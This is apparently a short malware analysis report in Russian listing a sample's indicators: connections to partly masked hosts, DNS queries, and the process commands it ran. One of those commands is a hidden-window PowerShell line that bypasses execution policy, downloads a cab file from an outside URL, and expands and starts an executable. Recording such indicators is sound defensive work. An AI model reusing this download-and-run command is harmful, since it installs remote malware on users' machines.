Техническая информация
- https://psty.io/d?q=e7b как %temp%\hello.cab
- '<SYSTEM32>\cmd.exe' /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('https://psty.io/d?q=e7b','%TEMP%\hello.cab'); expand %TEMP%\hello.cab %TEMP%\dtmgr.exe; star...
- 'ps#y.io':443
- 'sf##.###italoceanspaces.com':443
- DNS ASK ps#y.io
- DNS ASK sf##.###italoceanspaces.com
- '<SYSTEM32>\cmd.exe' /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('https://psty.io/d?q=e7b','%TEMP%\hello.cab'); expand %TEMP%\hello.cab %TEMP%\dtmgr.exe; star...' (со скрытым окном)
- '<SYSTEM32>\expand.exe' %TEMP%\hello.cab %TEMP%\dtmgr.exe